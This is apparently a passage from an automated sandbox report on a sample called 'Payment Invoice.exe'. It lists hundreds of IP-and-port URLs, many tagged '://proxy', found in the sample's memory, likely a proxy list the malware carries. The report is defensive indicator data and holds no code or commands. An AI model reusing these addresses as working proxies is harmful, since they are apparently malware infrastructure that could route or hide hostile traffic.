                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://34.93.157.87:21802://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.154.71.72:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.154.71.72:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.196.18.239
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.196.18.239://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.196.18.239:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.199.90.225:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.199.90.225:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.207.123.94:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.237.210.215:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://35.237.210.215:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631723D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631729D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.134.91.82:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163172AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.134.91.82:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.229.100.73:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.104.1:13623
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.255.104.1:13623://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AF5000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.37.244.41:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.37.244.41:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.132.91:3127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.132.91:3127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.22.18:8199
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.64.22.18:8199://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.133.19:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.133.19:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.36.252:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.66.36.252:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.14.195:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.14.195:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.27.189:39674
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.67.27.189:39674://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.90.61.224:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.90.61.224:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.107.245:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.107.245:8080://proxyP
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.116.162:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.116.162:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183C6000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163183B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.117.59:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.117.59:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.148.36:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.91.148.36:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.193.189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.193.189://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.193.189:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.81.181:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.92.81.181:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.189.165:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.189.165:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://36.95.48.45:1080P
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.133.137:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.140.158:3128j
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.187.59
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.187.59://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.187.59:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.189.106:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.192.154:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.120.192.154:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.148.217.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.148.217.234:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.148.217.234:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318418000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318407000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.152.163.95:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631840F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.152.163.95:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.163:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.146.163:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.4
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.156.28.43:3128://proxy2m
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.18.73.60:5566://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.24.201:81
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.24.201:81://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:41385
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.73.7:41385://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.5
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:10710
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:10710://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:14470
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:14470://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:18936://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A95000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:21861
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:21861://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319915000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163197A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631979F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:29380://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:3139
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:3139://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:37920://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:59870
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:59870://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:64494
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.187.77.58:64494://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.207.45.15:48678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.207.45.15:48678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.228.65.107:51032
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.48.19
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.48.19://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.235.48.19:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.26.223.96:9080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.40.178:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:37758
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:37758://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:8998
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.32.98.160:8998://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.238.2:53471://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.247.217:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.44.247.217:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.53.90.82
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.53.90.82:12542
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://37.53.90.82:12542://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.109:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.10.69.109:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.219:55994
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.172.219:55994://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.126:46656
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.126:46656://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.16:55994
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.16:55994://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.84:11537
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.127.179.84:11537://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.77:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.77:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.78:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.233.78:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.135:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.135:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.195:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.72.195:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.54:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.73.54:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.74.51:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.156.74.51:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.159.232.6:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.159.232.6:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.183.144.117:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.183.144.117:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.251.177:6270
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.242.251.177:6270://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.232.2:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.253.232.2:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.94:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.0.94:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163179AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.27.150:11201
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.41.27.150:11201://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.45.4
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.45.44.51:6332
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.45.44.51:6332://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.49.129.154:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.49.129.154:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.165.55:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.50.165.55:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.51.49.84:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:9000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.101.254:9000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.116.9:3128
